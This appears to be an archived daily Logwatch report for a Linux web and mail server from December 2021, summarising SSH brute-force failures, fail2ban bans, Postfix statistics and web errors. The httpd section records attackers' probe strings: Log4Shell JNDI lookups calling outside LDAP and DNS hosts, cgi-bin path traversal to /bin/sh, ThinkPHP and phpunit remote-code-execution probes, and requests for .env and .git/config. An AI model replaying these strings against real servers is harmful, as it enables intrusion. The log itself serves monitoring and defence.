[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Dienstag, 14 Dezember 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Tue Dec 14 04:42:04 2021
        Date Range Processed: yesterday
                              ( 2021-Dec-13 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [ 23:23 ]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 Connection attempts using mod_proxy:
    112.94.253.176 -> zapf.wiki:443: 1 Time(s)
    223.167.74.215 -> zapf.wiki:443: 1 Time(s)
    45.81.235.112 -> 45.81.235.214:4444: 9 Time(s)
    60.191.125.35 -> zapf.wiki:443: 1 Time(s)
 
 A total of 3 sites probed the server 
    159.65.36.205
    61.219.11.151
    66.240.205.34
 
 Requests with error response codes
    400 Bad Request
       45.81.235.214:4444: 9 Time(s)
       null: 4 Time(s)
       zapf.wiki:443: 3 Time(s)
       /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
       /config/getuser?index=0: 2 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
       mstshash=Administr: 2 Time(s)
       mstshash=Domain: 2 Time(s)
       /: 1 Time(s)
       /.git/config: 1 Time(s)
       /aaa9: 1 Time(s)
       /aab9: 1 Time(s)
       /ab2g: 1 Time(s)
       /ab2h: 1 Time(s)
       /cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s)
    404 Not Found
       /berlin/apple-touch-icon.png: 1 Time(s)
    500 Internal Server Error
       /: 22 Time(s)
       /robots.txt: 4 Time(s)
       /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D: 2 Time(s)
       /.env: 2 Time(s)
       //QeeB: 2 Time(s)
       /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D: 1 Time(s)
       /.git/config: 1 Time(s)
       /Autodiscover/Autodiscover.xml: 1 Time(s)
       /_ignition/execute-solution: 1 Time(s)
       /_profiler/phpinfo: 1 Time(s)
       /aaa9: 1 Time(s)
       /aab9: 1 Time(s)
       /actuator/health: 1 Time(s)
       /bag2: 1 Time(s)
       /console/: 1 Time(s)
       /debug/default/view?panel=config: 1 Time(s)
       /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
       /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /owa/auth/logon.aspx: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
       /owa/auth/x.js: 1 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (121.4.179.91): 38 Time(s)
       root (106.12.86.8): 37 Time(s)
       root (168.194.162.142): 37 Time(s)
       root (167.71.233.95): 35 Time(s)
       root (139.59.228.214): 33 Time(s)
       root (203.176.78.120): 33 Time(s)
       root (119.82.135.226): 30 Time(s)
       root (139.155.35.47): 25 Time(s)
       root (49.232.138.121): 21 Time(s)
       root (143.110.212.213): 19 Time(s)
       unknown (139.155.35.47): 17 Time(s)
       unknown (139.59.228.214): 17 Time(s)
       root (124.152.213.64): 16 Time(s)
       unknown (167.71.233.95): 15 Time(s)
       unknown (203.176.78.120): 15 Time(s)
       unknown (106.12.86.8): 13 Time(s)
       unknown (168.194.162.142): 13 Time(s)
       unknown (119.82.135.226): 11 Time(s)
       unknown (143.110.212.213): 11 Time(s)
       unknown (124.152.213.64): 9 Time(s)
       unknown (49.232.138.121): 9 Time(s)
       unknown (121.4.179.91): 7 Time(s)
       unknown (193.169.254.138): 2 Time(s)
       unknown (221.147.61.84): 2 Time(s)
       root (1.37.33.24): 1 Time(s)
       root (164.90.203.55): 1 Time(s)
       root (167.71.10.210): 1 Time(s)
       root (180.254.73.75): 1 Time(s)
       root (193.169.254.138): 1 Time(s)
       root (223.99.170.130): 1 Time(s)
       unknown (211.76.125.186): 1 Time(s)
       unknown (45.141.84.10): 1 Time(s)
       unknown (synprobe001.leakix.net): 1 Time(s)
       unknown (vmi744046.contaboserver.net): 1 Time(s)
    Invalid Users:
       Unknown Account: 145 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

        6   Miscellaneous warnings  
 
    8.927K  Bytes accepted                               9,141
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        1   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        1   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
       17   Connections             
        9   Connections lost (inbound) 
       17   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        1   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Failed logins from:
    1.37.33.24: 1 time
    49.232.138.121: 21 times
    106.12.86.8: 37 times
    119.82.135.226 (static.cmcti.vn): 30 times
    121.4.179.91: 38 times
    124.152.213.64: 16 times
    139.59.228.214: 33 times
    139.155.35.47: 25 times
    143.110.212.213: 19 times
    164.90.203.55: 1 time
    167.71.10.210: 1 time
    167.71.233.95: 35 times
    168.194.162.142 (142.162.194.168.rfc6598.dynamic.copelfibra.com.br): 37 times
    180.254.73.75: 1 time
    193.169.254.138: 1 time
    203.176.78.120: 33 times
    223.99.170.130: 1 time
 
 Illegal users from:
    2001:470:1:c84::20: 1 time
    undef: 109 times
    45.88.188.13 (vmi744046.contaboserver.net): 1 time
    45.141.84.10: 1 time
    49.232.138.121: 9 times
    65.49.20.66 (scan-17.shadowserver.org): 1 time
    106.12.86.8: 13 times
    119.82.135.226 (static.cmcti.vn): 11 times
    121.4.179.91: 7 times
    124.152.213.64: 9 times
    139.59.228.214: 17 times
    139.155.35.47: 17 times
    143.110.212.213: 11 times
    167.71.13.196 (synprobe001.leakix.net): 1 time
    167.71.233.95: 15 times
    168.194.162.142 (142.162.194.168.rfc6598.dynamic.copelfibra.com.br): 13 times
    193.169.254.138: 2 times
    203.176.78.120: 15 times
    211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time
    221.147.61.84: 2 times
 
 **Unmatched Entries**
 Disconnecting: Change of username or service not allowed: (admin,ssh-connection) ->
(0,ssh-connection) [preauth] : 1 time(s)
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop33257p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)